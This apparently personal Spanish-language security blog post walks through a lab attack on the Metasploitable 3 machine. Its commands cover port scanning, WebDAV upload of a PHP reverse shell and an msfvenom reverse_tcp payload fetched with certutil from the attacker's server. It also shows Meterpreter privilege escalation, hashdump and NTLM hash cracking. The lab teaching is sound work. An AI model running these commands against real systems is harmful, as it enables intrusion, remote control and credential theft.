<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="es-ES" >
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="Análsis de Vulnerabilidades y Explotación" />
<meta property="og:locale" content="es_ES" />
<meta name="description" content="Cómo enumerar usuarios y crackear contraseñas de servicios vulnerables." />
<meta property="og:description" content="Cómo enumerar usuarios y crackear contraseñas de servicios vulnerables." />
<link rel="canonical" href="https://balo93.github.io/posts/analisis-vuln-enum/" />
<meta property="og:url" content="https://balo93.github.io/posts/analisis-vuln-enum/" />
<meta property="og:site_name" content="CyberBalo" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2026-03-28T17:39:00-05:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Análsis de Vulnerabilidades y Explotación" />
<meta name="twitter:site" content="@alvarogbalo" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2026-04-06T23:54:16-05:00","datePublished":"2026-03-28T17:39:00-05:00","description":"Cómo enumerar usuarios y crackear contraseñas de servicios vulnerables.","headline":"Análsis de Vulnerabilidades y Explotación","mainEntityOfPage":{"@type":"WebPage","@id":"https://balo93.github.io/posts/analisis-vuln-enum/"},"url":"https://balo93.github.io/posts/analisis-vuln-enum/"}</script>
<!-- End Jekyll SEO tag -->


  <title>Análsis de Vulnerabilidades y Explotación | CyberBalo
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="CyberBalo">
<meta name="application-name" content="CyberBalo">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.6/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/es.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/perfil.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">CyberBalo</a>
    <p class="site-subtitle fst-italic mb-0">Documentando mi camino en la ciberseguridad</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>INICIO</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORÍAS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>ETIQUETAS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVO</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ACERCA DE</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
      <button type="button" class="btn btn-link nav-link" aria-label="Switch Mode" id="mode-toggle">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    

      
        <a
          href="https://github.com/Balo93"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    

      
        <a
          href="https://twitter.com/alvarogbalo"
          aria-label="twitter"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fa-brands fa-x-twitter"></i>
        </a>
      
    

      
        <a
          href="javascript:location.href = 'mailto:' + ['alvarogb91','gmail.com'].join('@')"
          aria-label="email"
          

          

          

          
        >
          <i class="fas fa-envelope"></i>
        </a>
      
    
          
      

      
        <a
          href="https://www.linkedin.com/in/alvarogavilanes93/"
          aria-label="linkedin"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-linkedin"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" class="flex-shrink-0" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Inicio</a>
            </span>

          
        
          
        
          
            
              <span>Análsis de Vulnerabilidades y Explotación</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link" aria-label="Sidebar">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Entrada
    </div>

    <button type="button" id="search-trigger" class="btn btn-link" aria-label="Search">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Buscar..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancelar</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->





<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  




<!-- return -->










<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>Análsis de Vulnerabilidades y Explotación</h1>
    
      <p class="post-desc fw-light mb-4">Cómo enumerar usuarios y crackear contraseñas de servicios vulnerables.</p>
    

    <div class="post-meta text-muted">
      <span>
        Publicado
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1774737540"
  data-df="DD/MM/YYYY"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  28/03/2026
</time>

      </span>

      
        <span>
          Actualizado
          <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1775537656"
  data-df="DD/MM/YYYY"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  06/04/2026
</time>

        </span>
      

      

      <div class="d-flex justify-content-between">
        <span>
          

          Por

          <em>
            
              <a href="https://twitter.com/alvarogbalo">Alvaro Gavilanes</a>
            
          </em>
        </span>

        <div>
          
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="1395 palabras"
>
  <em>7 min</em> de lectura</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">Análsis de Vulnerabilidades y Explotación</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contenido</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">Análsis de Vulnerabilidades y Explotación</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <p>En este artículo, analizaremos distintas metodologías para identificar y explotar vulnerabilidades en sistemas Windows. Para nuestra práctica, utilizaremos la máquina Metasploitable 3, un entorno diseñado con múltiples servicios vulnerables que nos permite poner a prueba habilidades de enumeración y escalada de privilegios.</p>

<h2 id="1-escaneo-de-puertos-y-enumeración--windows"><span class="me-2">1. Escaneo de Puertos y Enumeración | Windows</span><a href="#1-escaneo-de-puertos-y-enumeración--windows" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>El primer paso es identificar la superficie de ataque del host objetivo.</p>

<h3 id="reconocimiento-inicial"><span class="me-2">Reconocimiento inicial</span><a href="#reconocimiento-inicial" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>Comenzamos verificando la conectividad y realizando un escaneo rápido de todos los puertos abiertos:</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="c"># Verificar conectividad</span>
ping dominio.local

<span class="c"># Escaneo rápido de todos los puertos (65535)</span>
nmap <span class="nt">-p-</span> <span class="nt">-T5</span> dominio.local
</pre></td></tr></tbody></table></code></div></div>

<h3 id="enumeración-detallada-de-servicios"><span class="me-2">Enumeración detallada de servicios</span><a href="#enumeración-detallada-de-servicios" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>Una vez identificados los puertos, realizamos un análisis profundo de versiones y scripts predeterminados</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>nmap <span class="nt">-p--T5</span> <span class="nt">-sV</span> <span class="nt">-sC</span> <span class="nt">-n</span> dominio.local <span class="nt">--stats-every</span> 3
</pre></td></tr></tbody></table></code></div></div>

<blockquote class="prompt-tip">
  <p>Si el sitio utiliza WordPress o servicios específicos, recuerda mapear la IP y el dominio en tu archivo /etc/hosts para que el navegador resuelva correctamente las rutas internas..</p>
</blockquote>

<p>Para identificar nombres de host y detalles del protocolo SMB, utilizamos CrackMapExec (o su sucesor, NetExec):</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>crackmapexec smb dominio.local
</pre></td></tr></tbody></table></code></div></div>

<h2 id="2-explotación-web-vulnerabilidad-webdav"><span class="me-2">2. Explotación Web: Vulnerabilidad WebDAV</span><a href="#2-explotación-web-vulnerabilidad-webdav" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Al navegar por el puerto 8585 (http://dominio.local:8585/uploads), detectamos que el directorio /uploads podría tener habilitado el método PUT.</p>

<p>Con nmap podemos hacer un escaneo de http-enum, cuyo formato es el siguiente:</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>nmap <span class="nt">-p</span> 8585 <span class="nt">--script</span> http-enum <span class="nt">-sV</span> dominio.local
</pre></td></tr></tbody></table></code></div></div>

<p>Este comando permite saber que folders permiten recabar información.</p>

<h3 id="pruebas-con-davtest"><span class="me-2">Pruebas con Davtest</span><a href="#pruebas-con-davtest" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>Usamos davtest para verificar automáticamente qué extensiones de archivos permite subir y ejecutar el servidor:</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>davtest <span class="nt">-sendbd</span> <span class="nt">-auto</span> <span class="nt">-url</span> http://dominio.local:8585/uploads
</pre></td></tr></tbody></table></code></div></div>
<p>¿Qué estamos haciendo con estos parámetros?</p>

<ul>
  <li>-url: Define el directorio objetivo donde WebDAV está activo.</li>
  <li>-sendbd: Envía archivos que contienen “backdoors” simples para verificar si el servidor interpreta el código.</li>
  <li>-auto: Automatiza la subida de una amplia biblioteca de extensiones para determinar qué filtros de seguridad tiene el servidor.</li>
</ul>

<h3 id="metodología-de-la-herramienta"><span class="me-2">Metodología de la Herramienta</span><a href="#metodología-de-la-herramienta" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>El funcionamiento de davtest es ingenioso: crea un directorio temporal dentro de /uploads e intenta cargar una ráfaga de ficheros con distintas extensiones (como .php, .txt, .html, .asp, entre otros).</p>

<p>La verdadera potencia de esta herramienta no es solo decirnos qué archivos se subieron, sino confirmar cuáles son ejecutables. Si el reporte final indica que los scripts .php se ejecutan correctamente, tenemos el camino libre para subir una Reverse Shell y tomar el control del servidor.</p>

<h3 id="subida-de-archivos-con-cadaver"><span class="me-2">Subida de Archivos con Cadaver</span><a href="#subida-de-archivos-con-cadaver" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>Podemos usar una shell de PHP ya lista en Kali Linux, para ello podemos buscar las propias reverse shell que existen dentro de linux o acceder a repositorios github para buscar reverse shell listas:</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="c"># Búsqueda en linux</span>
locate php-rev
more /usr/share/laudanum/php/php-reverse-shell.php

<span class="c">#Búsqueda en Linux para cualquier Sistema Operativo.</span>
http://github.com/ckiller2HM/scripts/blob/main/php-rev-shell.php
</pre></td></tr></tbody></table></code></div></div>

<p>Los pasos para cargar la shell son los siguientes:</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre>ping dominio.local <span class="nt">-I</span> eth0
arp-scan <span class="nt">-I</span> eth1 <span class="nt">--localnet</span>
<span class="c">#Buscar cuál es la interfaz que tiene conexión con el dominio.</span>

<span class="c">#Conectarse vía WebDAV y subir el archivo</span>
cadaver http://dominio.local:8585/uploads
dav:/uploads/&gt; <span class="nb">help
</span>dav:/uploads/&gt; put php-rev-shell.php
</pre></td></tr></tbody></table></code></div></div>

<h3 id="estableciendo-la-conexión"><span class="me-2">Estableciendo la Conexión</span><a href="#estableciendo-la-conexión" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>Preparamos un listener con Netcat en nuestra máquina atacante y ejecutamos el script desde el navegador o davtest:</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>nc <span class="nt">-nlvp</span> 8765
</pre></td></tr></tbody></table></code></div></div>

<h2 id="3-post-explotación-y-escalada-de-privilegios"><span class="me-2">3. Post-Explotación y Escalada de Privilegios</span><a href="#3-post-explotación-y-escalada-de-privilegios" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Una vez dentro de la CMD de Windows, recolectamos información crítica:</p>

<p>Ahora detallaremos los comándos útiles que podemos emplear en una cmd de Windows</p>
<ul>
  <li>systeminfo &gt; Información general del sistema y parches faltantes.</li>
  <li>Whoami &gt; Permite saber cómo está ejecutanto la información el usuario, si tenemos acceso al root sería lo ideal.</li>
  <li>net user usuariodeprueba password /add &gt; Si tenemos los permisos, podremos crear un usuario de prueba.</li>
  <li>whoami /priv &gt; Se puede ver los privilegios que posee dicho usuario.
    <ul>
      <li>SeImpersonatePrivilege &gt; Un privilegio importante, el cual permite personificar un servicio u otro usuario. Si se tiene habilitado, se puede escalar privilegios a través de distintos binarios. El más útil se llama JuicyPotato.exe o GodPotato.exe o con un módulo de Metasploit.
        <h3 id="migración-a-metasploit-meterpreter"><span class="me-2">Migración a Metasploit (Meterpreter)</span><a href="#migración-a-metasploit-meterpreter" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
        <p>Para una gestión más avanzada, migramos nuestra shell básica a una sesión de Meterpreter.</p>
      </li>
    </ul>
  </li>
  <li>En linux se debe generar el payload mediante MSFVENOM o revshells.com
    <ul>
      <li><strong><a href="https://revshells.com">Revshells</a></strong>: Permite construir la línea de msfvenom para crear una revershell y poder escalar privilegios.</li>
    </ul>
  </li>
</ul>

<h4 id="1-generar-el-payload-e-iniciar-el-servidor"><span class="me-2">1. Generar el Payload e iniciar el servidor:</span><a href="#1-generar-el-payload-e-iniciar-el-servidor" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>msfvenom <span class="nt">-p</span> windows/x64/meterpreter/reverse_tcp <span class="nv">LHOSTS</span><span class="o">=</span>&lt;TU_IP&gt; <span class="nv">LPORT</span><span class="o">=</span>1234 <span class="nt">-f</span> exe <span class="nt">-o</span> reverse.exe
python3 <span class="nt">-m</span> http.server 80
</pre></td></tr></tbody></table></code></div></div>
<blockquote class="prompt-warning">
  <p>Advertencia: La IP que va en LHOSTS debe ser de la máquina que está atacando.</p>
</blockquote>

<h4 id="2-transferir-el-archivo"><span class="me-2">2. Transferir el archivo:</span><a href="#2-transferir-el-archivo" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>Levantamos un servidor en Python y usamos certutil.exe en la máquina víctima:</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>c:<span class="se">\\</span>Windows<span class="se">\T</span>emp<span class="se">\ </span><span class="o">&gt;</span> certutil.exe <span class="nt">-f</span> <span class="nt">-split</span> <span class="nt">-urlcache</span> http://&lt;TU_IP&gt;/reverse.exe reverse.exe
</pre></td></tr></tbody></table></code></div></div>

<h4 id="3ejecutar-el-handler"><span class="me-2">3.Ejecutar el Handler:</span><a href="#3ejecutar-el-handler" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>Con la shell de arriba se logra traer el programa reverse.exe a la máquina Windows y se queda a la espera hasta que msfconsole esté a la escucha.</p>

<p>En Metasploit, configuramos el multi/handler y ejecutamos reverse.exe en la víctima.</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre>msfconsole <span class="nt">-q</span>
use exploit/multi/handler
<span class="nb">set </span>payload windows/x64/meterpreter/reverse_tcp
<span class="nb">set </span>LHOST eth1
<span class="nb">set </span>LPORT 5321
run

meterpreter&gt; getprivs <span class="c">#privilegios que tiene el usuario</span>
meterpreter&gt; getuid <span class="c">#Permite ver que usuario soy</span>
meterpreter&gt; getsystem <span class="c">#Permite escalar privilegios</span>

Ctrl+Z <span class="c"># Permite hacer un backgroud de la sessión</span>
sessions <span class="nt">-i</span> 1 <span class="c"># Permite regresar a la sesión</span>
</pre></td></tr></tbody></table></code></div></div>
<h2 id="4-extracción-de-credenciales-y-movimiento-lateral"><span class="me-2">4. Extracción de Credenciales y Movimiento Lateral</span><a href="#4-extracción-de-credenciales-y-movimiento-lateral" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Dentro de Meterpreter, podemos automatizar la búsqueda de vulnerabilidades de escalada:</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre>use post/multi/recon/local_exploit_suggester
<span class="nb">set </span>session 1
run <span class="c">#Con esto se puede saber todos los módulos que permiten explotar la máquina</span>

use exploit/windows/local/ms16_075/reflection/juicy
<span class="nb">set </span>payload windows/x64/meterpreter/reverse_tcp
<span class="nb">set </span>LPORT 4923
<span class="nb">set </span>session 1
exploit <span class="c">#abre una segunda sessión</span>
</pre></td></tr></tbody></table></code></div></div>
<h3 id="dumpeo-de-hashes"><span class="me-2">Dumpeo de Hashes</span><a href="#dumpeo-de-hashes" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>Si logramos privilegios de administrador, extraemos los hashes de las cuentas locales:</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>meterpreter <span class="o">&gt;</span> hashdump
</pre></td></tr></tbody></table></code></div></div>
<p>Para descifrar los hashes NTLM obtenidos, puedes usar John the Ripper o servicios online como CrackStation:</p>

<blockquote class="prompt-tip">
  <p>Advertencia: Crackstation solo descifra la segunda parte del hash.</p>
</blockquote>

<h4 id="extraer-datos-de-hashes"><span class="me-2">Extraer datos de hashes</span><a href="#extraer-datos-de-hashes" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nb">cat </span>hashes.txt | <span class="nb">cut</span> <span class="nt">-d</span> <span class="s2">":"</span> <span class="nt">-f</span> 4 <span class="c">#-f es el número de cámpo</span>
</pre></td></tr></tbody></table></code></div></div>
<h4 id="descifrar-con-crackstation"><span class="me-2">Descifrar con CrackStation</span><a href="#descifrar-con-crackstation" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p><strong><a href="https://crackstation.com">Crackstation</a></strong>: Descifra los hashes que sean cómunes y no complejos.</p>

<h4 id="descifrar-con-john-the-ripper"><span class="me-2">Descifrar con John the ripper</span><a href="#descifrar-con-john-the-ripper" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>john hashes.txt <span class="nt">--format</span><span class="o">=</span>NT
</pre></td></tr></tbody></table></code></div></div>
